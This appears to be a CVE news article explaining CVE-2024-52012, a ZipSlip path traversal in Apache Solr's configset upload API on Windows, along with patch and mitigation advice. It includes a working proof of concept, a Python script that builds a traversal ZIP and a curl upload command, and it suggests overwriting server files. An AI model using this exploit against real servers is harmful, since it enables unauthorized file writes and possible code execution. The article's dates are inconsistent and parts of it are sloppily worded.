CVE CyberSecurity Database News

CVE-2024-52012 - Relative Path Traversal ("ZipSlip") Vulnerability in Apache Solr – Full Exploit Details & Mitigation

Poster -

Published: June 2024

Summary

On Windows systems, Apache Solr instances (versions 6.6 to 9.7.) are vulnerable to a relative path traversal—also known as a "ZipSlip"—in its configset upload API. Attackers can exploit this to write files to unexpected directories outside the intended extraction path, leading to arbitrary file write, potential remote code execution, or denial of service.

This long-read explains CVE-2024-52012, why it happens, how attackers exploit it, the risks, and how to stay safe.

What is Apache Solr?

Apache Solr is a popular open-source search platform for big data and enterprise search.

One of its features lets admins upload configuration sets ("configsets"), often in ZIP format, via an API. This speeds up configuration, but, as we’ll show, also introduces risk when not properly sanitized.

The Root Cause

When you upload a configset ZIP file to Solr using the configset API, Solr extracts the ZIP contents directly to its server filesystem.

The vulnerability arises because Solr fails to properly check file paths inside these ZIP files. If a malicious ZIP file contains entries with relative paths (like ../../windows/win.ini), Solr will extract files outside of the target directory—sometimes anywhere the Solr process can write!

This is classic ZipSlip: a file extraction flaw rooted in failing to check for ../ ("directory traversal") in archive entries.

Official Advisory

- Apache Security Team notification: https://solr.apache.org/security.html#cve-2024-52012

Exploitation: How Hackers Attack

Suppose Solr runs on Windows, reachable over network, with unauthenticated configset upload (default on many test/dev installs).

Craft a Malicious ZIP:

- Create a ZIP with an entry path like ../../out_of_bounds.txt

Upload ZIP via Configset API:

- Use an HTTP POST request to /solr/admin/configs?action=UPLOAD

Solr Extracts Files:

- ZIP contents are written to unexpected paths on the server, up to the privileges of the Solr user.

Crafting the Malicious ZIP (Python)

import zipfile

malicious_zip = 'evil.zip'
with zipfile.ZipFile(malicious_zip, 'w') as zf:
    zf.writestr('../../hacked.txt', 'You got hacked!')
print('Malicious ZIP created.')

Uploading with curl

curl -X POST "http://<solr-server>:8983/solr/admin/configs?action=UPLOAD&name=evilset"; \
  -H "Content-Type: application/octet-stream" --data-binary "@evil.zip"

After this, if Solr is vulnerable, a file like C:\solr\hacked.txt (or even higher directories) is created.

The attacker can attempt to overwrite sensitive files (e.g., solr.in.cmd, webapps\ROOT\index.jsp, etc.) depending on permissions.

Danger Level

- Arbitrary Write: Any file Solr can write can be overwritten or created, including configs, scripts, and executables.
- RCE Possibility: If attacker overwrites executable code that's later run by Solr or accessed via web, remote code execution may result.

Fixing and Mitigating CVE-2024-52012

### Official Patch / Upgrade

The quickest and surest fix: Upgrade Apache Solr to at least version 9.8..

- Download latest: https://solr.apache.org/downloads.html
- Official advisory: https://solr.apache.org/security.html#cve-2024-52012
- "Input paths in ZIP entry names are now sanitized at extraction; relative paths with .. or malformed paths are rejected."

Lock Down Configset Upload:

- Use Solr’s Rule-Based Authentication Plugin to ensure only trusted, authenticated users can access the upload API (/solr/admin/configs).

Servers where the configset API is *unprotected*.

- Dev/test servers with default or weak authentication.

Additional Resources

- Solr Security Documentation
- Original Patch Commit (may differ, check latest)
- OWASP ZipSlip background

Conclusion and Recommendations

CVE-2024-52012 is easy to exploit and has serious consequences. All Windows-based Solr deployments should be considered at risk until patched. Even if you don’t expose your Solr to the internet, a compromised application or internal attacker could leverage this flaw to escalate their access.

Never allow Solr admin interfaces on the public internet

*Stay ahead of attackers—patch fast, restrict access, and monitor your systems!*


If you found this writeup useful, share it and stay safe. For technical questions, check the Solr mailing lists, or ask below.


*This article is an exclusive, original summary based on the public CVE disclosure and Solr advisories. Please reference Apache Solr Security for official updates.*

Timeline

Published on: 01/27/2025 09:15:14 UTC
Last modified on: 02/06/2025 17:15:19 UTC